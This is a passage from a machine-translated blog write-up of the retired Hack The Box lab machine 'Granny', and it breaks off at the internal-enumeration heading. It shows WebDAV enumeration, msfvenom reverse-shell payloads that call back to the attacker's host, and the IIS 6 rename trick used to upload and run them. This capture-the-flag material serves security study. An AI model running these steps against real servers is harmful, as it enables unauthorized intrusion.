{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-windows-granny.-en","result":{"data":{"markdownRemark":{"id":"061e88ee-ec16-5aab-81f0-a324bd57b602","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-windows-granny.\">original page</a>.</p>\n</blockquote>\n<p>I use the penetration-testing learning platform “Hack The Box” to study security.\nAt the time of writing, my rank on Hack The Box is ProHacker.</p>\n<span class=\"gatsby-resp-image-wrapper\" style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 220px; \">\n      <a class=\"gatsby-resp-image-link\" href=\"/static/d011d6d6eab864b12cfe0f1292f5c902/c8042/327080.png\" style=\"display: block\" target=\"_blank\" rel=\"noopener\">\n    <span class=\"gatsby-resp-image-background-image\" style=\"padding-bottom: 22.727272727272727%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABU0lEQVQY0zWPO08CURBG91/Y22ijUVYU2L3rvkCWIETARUDUDb5ifGbVRFB8dlZaGCtjaWJr4U/wV93jBWNxMpOZzMk32k035uLsUF53jwhX6hQqdYrVOuWwRbW5RjPaUrMQ08vj5BeZm/dxghKGFyCyBUw/IClcdMOWCrTP9yv59fHIz/cbt/2Yzt4x8UWPnYMTDuJzejd3tDvbuIsVau1oKK822mxub7GyFg13KTs7EDJjelLr35V4eu7K15d7HvqnlMINWtEu9kJJUaa5sYtwAmbKLRL+EtN2EeG7xOsmpj1P1reYSjvoGSGnUjpauT4qO/sBl711OlENr2ZQbDjkaiZBI0Nx1cKvCIycRW45jShY6thlVjgqkaPeVckMj+mMjh+OSG0iMaYG49KyZ0magkzW/MNXkoUBqs8JUq6FyKvqDIQqkfGPPRQn0kJOJnV+AYVuwMlYm72bAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"></span>\n  <picture>\n          <source srcset=\"/static/d011d6d6eab864b12cfe0f1292f5c902/b5458/327080.webp 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/webp\">\n          <source srcset=\"/static/d011d6d6eab864b12cfe0f1292f5c902/c8042/327080.png 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/png\">\n          <img class=\"gatsby-resp-image-image\" src=\"/static/d011d6d6eab864b12cfe0f1292f5c902/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\" loading=\"lazy\" style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\">\n        </picture>\n  </a>\n    </span>\n<p>This time I am writing up the retired HackTheBox machine “Granny”.</p>\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to encourage acts that are contrary to social order.</strong></p>\n<p>Please note that attempting attacks against environments other than those you own or are authorized to use may violate the Act on the Prohibition of Unauthorized Computer Access (the Unauthorized Access Prohibition Act).</p>\n<p>All statements here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#about-this-article\">About This Article</a></li>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#internal-enumeration\">Internal Enumeration</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>As usual, I started with a port scan.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">'s/^[0-9].*$RHOST/10.10.10.15  $RHOST/g'</span> /etc/hosts\n$ nmap -sV -sC -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\nStarting Nmap <span class=\"token number\">7.92</span> <span class=\"token punctuation\">(</span> https://nmap.org <span class=\"token punctuation\">)</span> at <span class=\"token number\">2022</span>-07-23 <span class=\"token number\">17</span>:48 PDT\nNmap scan report <span class=\"token keyword\">for</span> <span class=\"token variable\">$RHOST</span> <span class=\"token punctuation\">(</span><span class=\"token number\">10.10</span>.10.15<span class=\"token punctuation\">)</span>\nHost is up <span class=\"token punctuation\">(</span><span class=\"token number\">0</span>.25s latency<span class=\"token punctuation\">)</span>.\nNot shown: <span class=\"token number\">999</span> filtered tcp ports <span class=\"token punctuation\">(</span>no-response<span class=\"token punctuation\">)</span>\nPORT   STATE SERVICE VERSION\n<span class=\"token number\">80</span>/tcp <span class=\"token function\">open</span>  http    Microsoft IIS httpd <span class=\"token number\">6.0</span>\n<span class=\"token operator\">|</span>_http-server-header: Microsoft-IIS/6.0\n<span class=\"token operator\">|</span>_http-title: Under Construction\n<span class=\"token operator\">|</span> http-webdav-scan: \n<span class=\"token operator\">|</span>   Server Type: Microsoft-IIS/6.0\n<span class=\"token operator\">|</span>   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\n<span class=\"token operator\">|</span>   Server Date: Sun, <span class=\"token number\">24</span> Jul <span class=\"token number\">2022</span> 00:49:07 GMT\n<span class=\"token operator\">|</span>   WebDAV type: Unknown\n<span class=\"token operator\">|</span>_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK\n<span class=\"token operator\">|</span> http-methods: \n<span class=\"token operator\">|</span>_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT\nService Info: OS: Windows<span class=\"token punctuation\">;</span> CPE: cpe:/o:microsoft:windows\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class=\"token builtin class-name\">.</span>\nNmap done: <span class=\"token number\">1</span> IP address <span class=\"token punctuation\">(</span><span class=\"token number\">1</span> <span class=\"token function\">host</span> up<span class=\"token punctuation\">)</span> scanned <span class=\"token keyword\">in</span> <span class=\"token number\">27.76</span> seconds</code></pre></div>\n<p>It appeared that IIS was running on port 80.</p>\n<p>When I accessed it, the site showed “Under Construction”.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 526px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e8b3beacc1ce0108771c53db6e2635df/2d7ab/image-20220724095531659.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 85.83333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACoElEQVQ4y41SaU8aURSd/9CgrWUxgiLFWhKFJrWNqV1JWmxMtNpqW02a9I/yyaTKp5qwIzsIw8DAsAyn9z4Yw6BdXnJy33ruOfc+aX7eDeeiF16vFwH/E6yvb8DnC8Dvf4rA42dwLz+Cw0F3XF5Y7U5YZq24Y5nDzF0bZu7ZCTYTpLm5BVitLsw7FmG3L8HtXcPq2gaWKHoe+uFc9sHhXIFnNQD3yhoWH/jg9Pgwa3PBcn8BFqvTBGlz8zWCwfeEEF6+eoedj0c4OvmBnf0v2Pt8jA97hwiGdnHw9Tv2D0+w9+kYuwff8CK4jedvQth6u40tIxKkfD6HYrGFy8sSmoqMXDZL6xIKhQIK+TzFInrdLjRNE+iO57quQx8MMCBw7Pf76PV6kGS5hEhEQywmQ+sokOUGms0mRVmg0WhAVVVB1G630Wqp6HTaUBSF5q3xXksQ8pBYga73iF1DrVZDVigsIpNOI0XI5XJiL5NJU8wJIibhRA1K2KJkLIATDodDSGzPGCplurq6osuKIC+VSqjV60Ip7/Mek7FiRrvTuVbIZELhJGG5XCbrMaRSacTjccSiUdSJjB/zI4VVkUJWx0lYmVGewUA3E3IGUk0ZRyAOqtVoznES1BPTGd/lt8RiViiTvVQqJeqWyWRIbRRRUsmqY7E4EomEOOczjoxkMolKtQr9NstNssMNYcI6kXMDDLAtjoZNLgFDVdsYWzQ3hRca6edL/Nj4Bv8zjIaYFPJHFZ2mgqTpu0QiEWGR53GyfHZ+TqpHf5O7zQ46XMAx4XBaoUEoy3VRt9PTU/w8OxP1+3VxgXA4LPbK5YooDXdaG3XimuxGl3l0qYWsgv9goZBHlurJNa1UKoTqX+3eIJw+/FO9JvFPhdMPbsNtyozxG91JlXbJcMU0AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e8b3beacc1ce0108771c53db6e2635df/8ac56/image-20220724095531659.webp 240w,\n/static/e8b3beacc1ce0108771c53db6e2635df/d3be9/image-20220724095531659.webp 480w,\n/static/e8b3beacc1ce0108771c53db6e2635df/9752a/image-20220724095531659.webp 526w\"\n              sizes=\"(max-width: 526px) 100vw, 526px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e8b3beacc1ce0108771c53db6e2635df/8ff5a/image-20220724095531659.png 240w,\n/static/e8b3beacc1ce0108771c53db6e2635df/e85cb/image-20220724095531659.png 480w,\n/static/e8b3beacc1ce0108771c53db6e2635df/2d7ab/image-20220724095531659.png 526w\"\n            sizes=\"(max-width: 526px) 100vw, 526px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e8b3beacc1ce0108771c53db6e2635df/2d7ab/image-20220724095531659.png\"\n            alt=\"image-20220724095531659\"\n            title=\"image-20220724095531659\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I ran gobuster in the background while continuing enumeration.</p>\n<p>Also, since the port scan showed <code class=\"language-text\">WebDAV type: Unknown</code>, I decided to check whether WebDAV was actually running.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ /usr/bin/davtest -url http://<span class=\"token variable\">$RHOST</span>/\n********************************************************\n Testing DAV connection\nOPEN            SUCCEED:                http://<span class=\"token variable\">$RHOST</span>\n********************************************************\nNOTE    Random string <span class=\"token keyword\">for</span> this session: iEypK6GgIZG\n********************************************************\n Creating directory\nMKCOL           SUCCEED:                Created http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG\n********************************************************\n Sending <span class=\"token builtin class-name\">test</span> files\nPUT     aspx    FAIL\nPUT     cfm     SUCCEED:        http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG/davtest_iEypK6GgIZG.cfm\nPUT     php     SUCCEED:        http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG/davtest_iEypK6GgIZG.php\nPUT     asp     FAIL\nPUT     pl      SUCCEED:        http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG/davtest_iEypK6GgIZG.pl\nPUT     shtml   FAIL\nPUT     jsp     SUCCEED:        http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG/davtest_iEypK6GgIZG.jsp\nPUT     jhtml   SUCCEED:        http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG/davtest_iEypK6GgIZG.jhtml\nPUT     html    SUCCEED:        http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG/davtest_iEypK6GgIZG.html\nPUT     txt     SUCCEED:        http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG/davtest_iEypK6GgIZG.txt\nPUT     cgi     FAIL\n********************************************************\n Checking <span class=\"token keyword\">for</span> <span class=\"token builtin class-name\">test</span> <span class=\"token function\">file</span> execution\nEXEC    cfm     FAIL\nEXEC    php     FAIL\nEXEC    pl      FAIL\nEXEC    jsp     FAIL\nEXEC    jhtml   FAIL\nEXEC    html    SUCCEED:        http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG/davtest_iEypK6GgIZG.html\nEXEC    txt     SUCCEED:        http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG/davtest_iEypK6GgIZG.txt\n\n********************************************************\n/usr/bin/davtest Summary:\nCreated: http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG\nPUT File: http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG/davtest_iEypK6GgIZG.cfm\nPUT File: http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG/davtest_iEypK6GgIZG.php\nPUT File: http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG/davtest_iEypK6GgIZG.pl\nPUT File: http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG/davtest_iEypK6GgIZG.jsp\nPUT File: http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG/davtest_iEypK6GgIZG.jhtml\nPUT File: http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG/davtest_iEypK6GgIZG.html\nPUT File: http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG/davtest_iEypK6GgIZG.txt\nExecutes: http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG/davtest_iEypK6GgIZG.html\nExecutes: http://<span class=\"token variable\">$RHOST</span>/DavTestDir_iEypK6GgIZG/davtest_iEypK6GgIZG.txt</code></pre></div>\n<p>PUT appeared to be available for several file types.</p>\n<p>I confirmed that an HTML file I created could be uploaded and then accessed through the browser.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">curl</span> -T test.html http://<span class=\"token variable\">$RHOST</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 477px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/defec17e099623112002ee6b05ec9203/d743b/image-20220724100558683.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 41.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABGElEQVQoz61PUU/CMBjsH1E2sGxjKxtsDIGAQU0k+mB88nfiX8Cn6Ttma/c/lmU7vxaiPKOXXO7ar71eGXcjROkKvC8gRII4WWA0miEMp4jjg4/jOYIgQa/no+8M0esOcHnB0ek4sCwX1lFtIrNpyJ0QXVLPi4wfT5YIomv4FKrpUlh/MDZe0ANGae4JvT+C449xRcVsLsA4D6jZBA4FRdEUXWrw9PKK6fLecHbzgDBdwqOA280zVnePWKw3hsl8DUHth/Qrd5jColC23b4hyzJkH5/Y7d6x338hLySKE0qpIJVCnhcH0p45I48zolIlVFmC6QsadV2jqir8FUzK0pi2bX+0aZqzyXRdDb3QYafBZzb8DfwPfAPChuAsMJ8F1wAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/defec17e099623112002ee6b05ec9203/8ac56/image-20220724100558683.webp 240w,\n/static/defec17e099623112002ee6b05ec9203/78ba5/image-20220724100558683.webp 477w\"\n              sizes=\"(max-width: 477px) 100vw, 477px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/defec17e099623112002ee6b05ec9203/8ff5a/image-20220724100558683.png 240w,\n/static/defec17e099623112002ee6b05ec9203/d743b/image-20220724100558683.png 477w\"\n            sizes=\"(max-width: 477px) 100vw, 477px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/defec17e099623112002ee6b05ec9203/d743b/image-20220724100558683.png\"\n            alt=\"image-20220724100558683\"\n            title=\"image-20220724100558683\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So I went ahead and tried to upload an exploit file.</p>\n<p>However, uploading an ASP file is restricted, so a direct PUT is not possible.</p>\n<p>Instead, I exploited a WebDAV vulnerability present in IIS 5 and IIS 6.</p>\n<p>Since this machine was running IIS 6.0, I could upload the exploit as a <code class=\"language-text\">.txt</code> file and then rename it to <code class=\"language-text\">.asp;.txt</code>, which allows <code class=\"language-text\">shell.asp</code> to be executed.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ msfvenom -p windows/shell/reverse_tcp <span class=\"token assign-left variable\">LHOST</span><span class=\"token operator\">=</span><span class=\"token variable\">$LHOST</span> <span class=\"token assign-left variable\">LPORT</span><span class=\"token operator\">=</span><span class=\"token number\">4444</span> -f asp <span class=\"token operator\">></span> shell.txt\n\n$ cadaver http://<span class=\"token variable\">$RHOST</span>\ndav:/<span class=\"token operator\">></span> put shell.txt\ndav:/<span class=\"token operator\">></span> copy shell.txt shell.asp<span class=\"token punctuation\">;</span>.txt</code></pre></div>\n<p>Reference: <a href=\"https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/put-method-webdav#iis5-6-webdav-vulnerability\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">WebDav - HackTricks</a></p>\n<p>I expected to get a reverse shell this way, but for some reason the session dropped immediately and I could not obtain a shell.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 689px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f0dd1dec09184d678a1fec52660c48cb/0f79a/image-20220724165527786.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 29.166666666666668%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA8ElEQVQY012P2W7DIBBF/TupZLwUw7AZuxgvbaTm/3/mFkiTxn04GjRo7pyphB0xxS/EzxvCfsW8XiGMA2lCXAJiDAjhA34a0XYtGGvQNGe6rkPbtoVq21ds24I1ceyxMM8e1hpIKRISzlkQyRP5TykqNQfl0EzF33sIwcF5DykGkMykICFS/x44jg46DecArRVU5vdNROfAlnOYKUL7BcrNiYBBW0gSyXQqtt6PsM6UQcbY89TH+aeTj+8b4nZAqGThJpDxGEhDJMts5r0r1RiNvu+fJq+cDN8ul7QlbWX1H83doq5ZIVtlHoOvAf/5AfS5xJ01Ig6DAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/f0dd1dec09184d678a1fec52660c48cb/8ac56/image-20220724165527786.webp 240w,\n/static/f0dd1dec09184d678a1fec52660c48cb/d3be9/image-20220724165527786.webp 480w,\n/static/f0dd1dec09184d678a1fec52660c48cb/2e76f/image-20220724165527786.webp 689w\"\n              sizes=\"(max-width: 689px) 100vw, 689px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f0dd1dec09184d678a1fec52660c48cb/8ff5a/image-20220724165527786.png 240w,\n/static/f0dd1dec09184d678a1fec52660c48cb/e85cb/image-20220724165527786.png 480w,\n/static/f0dd1dec09184d678a1fec52660c48cb/0f79a/image-20220724165527786.png 689w\"\n            sizes=\"(max-width: 689px) 100vw, 689px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/f0dd1dec09184d678a1fec52660c48cb/0f79a/image-20220724165527786.png\"\n            alt=\"image-20220724165527786\"\n            title=\"image-20220724165527786\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I also tried <code class=\"language-text\">netcat-traditional</code>, but that failed as well.</p>\n<p>Looking at the packets, it appeared that an inbound connection was coming from the target, but it terminated after receiving the ACK.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/63d2d07cde4cd64375b426d9609238aa/58354/image-20220724180511650.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 15%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAApElEQVQI12WLzQqCUBCFfYzMbeVapTIN+8FFLUIX1x80kBuVUo/Rykq0Jz5N14qgxcc3c+aMtE58uHyFYWjB3s5apw6cbIlxbGNK2YK7dJvDCExiAoP92hQeRZboSx6/gB2uCIgorxASUdEgLu4I8hrJqUF6flBWic4Lti/bmezxEpushL+7gR1rSHJPg6IaUAY6um86fe1rmfjsivrP50cWfR1PbEJuNDuoMwMAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/63d2d07cde4cd64375b426d9609238aa/8ac56/image-20220724180511650.webp 240w,\n/static/63d2d07cde4cd64375b426d9609238aa/d3be9/image-20220724180511650.webp 480w,\n/static/63d2d07cde4cd64375b426d9609238aa/e46b2/image-20220724180511650.webp 960w,\n/static/63d2d07cde4cd64375b426d9609238aa/29105/image-20220724180511650.webp 1396w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/63d2d07cde4cd64375b426d9609238aa/8ff5a/image-20220724180511650.png 240w,\n/static/63d2d07cde4cd64375b426d9609238aa/e85cb/image-20220724180511650.png 480w,\n/static/63d2d07cde4cd64375b426d9609238aa/d9199/image-20220724180511650.png 960w,\n/static/63d2d07cde4cd64375b426d9609238aa/58354/image-20220724180511650.png 1396w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/63d2d07cde4cd64375b426d9609238aa/d9199/image-20220724180511650.png\"\n            alt=\"image-20220724180511650\"\n            title=\"image-20220724180511650\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Since I could not resolve the issue, I decided to try aspx instead.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ msfvenom -f aspx -p windows/shell_reverse_tcp <span class=\"token assign-left variable\">LHOST</span><span class=\"token operator\">=</span><span class=\"token variable\">$LHOST</span> <span class=\"token assign-left variable\">LPORT</span><span class=\"token operator\">=</span><span class=\"token number\">4445</span> -o rev.txt\n$ cadaver http://<span class=\"token variable\">$RHOST</span>\nput rev.txt\nmove rev.txt rev.aspx</code></pre></div>\n<p>With <code class=\"language-text\">.aspx</code>, PUT was not allowed, but MOVE was. Using MOVE, I was able to get a reverse shell.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 644px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b0155edccfa5178099c36bab7acc4b41/78274/image-20220724221130529.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 46.666666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABY0lEQVQoz4WR6U7DMBCE+zAI1Aaaq3Huy7Gdo6f6/u8y7G5ohRCIH582XnvHM/Hm5e0Dw3iCmW+I8x61njFMV/hJBS9MsVzucMsVdj5DuwV176DKHr2Z0RGNnqSqosPOT7B53W6h6hZ6PMMd77A07JYbys5C5SmcHTBPI5wzMEYjL3LsfR+BH6wEAXxeUw3DEBs/CGFHh3E0MjRNlgQcuq5B09RI0xRJkiDLMhQkplRCKOorKCJJDsjzDIfDQUQ3AQka02MYNLTuMc8jiVtYa6Su/Q6n04LL5SiiRVGgLFdYrK4ruUgEfbKdZakMWorHombooYl13UmPh9q2kbP7/V5irvyI7HnvdEsqEauqFAdcGXbA65b2mDiKnoO/IQ4jOjR8OWL7D7E1Wk69HHEcEfFz6C9BcbjbeZKfo7VtLQ/BETkef/ddK3sc67uTPwWDIEIUhc947PLhjv8X9/n1/3P24BPTFCy2TIkJOAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b0155edccfa5178099c36bab7acc4b41/8ac56/image-20220724221130529.webp 240w,\n/static/b0155edccfa5178099c36bab7acc4b41/d3be9/image-20220724221130529.webp 480w,\n/static/b0155edccfa5178099c36bab7acc4b41/f847d/image-20220724221130529.webp 644w\"\n              sizes=\"(max-width: 644px) 100vw, 644px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b0155edccfa5178099c36bab7acc4b41/8ff5a/image-20220724221130529.png 240w,\n/static/b0155edccfa5178099c36bab7acc4b41/e85cb/image-20220724221130529.png 480w,\n/static/b0155edccfa5178099c36bab7acc4b41/78274/image-20220724221130529.png 644w\"\n            sizes=\"(max-width: 644px) 100vw, 644px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b0155edccfa5178099c36bab7acc4b41/78274/image-20220724221130529.png\"\n            alt=\"image-20220724221130529\"\n            title=\"image-20220724221130529\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"internal-enumeration\" style=\"position:relative;\"><a href=\"#internal-enumeration\" aria-label=\"internal enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 